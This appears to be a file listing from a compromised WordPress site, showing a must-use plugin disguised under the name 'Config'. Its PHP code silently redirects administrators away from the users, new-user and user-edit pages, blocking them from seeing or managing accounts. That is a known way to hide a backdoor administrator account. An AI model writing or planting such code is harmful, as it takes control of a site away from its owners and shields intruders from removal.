File "config.php"
Full Path: /home/veodprin/public_html/wp-content/mu-plugins/config.php
File size: 280 bytes
MIME-type: text/x-php
Charset: utf-8
<?php
/*
Plugin Name: Config
*/
add_action('admin_init', function() {
$page = basename($_SERVER['PHP_SELF']);
if ($page === 'users.php' || $page === 'user-new.php' || $page === 'user-edit.php') {
wp_safe_redirect(admin_url());
exit();
}
});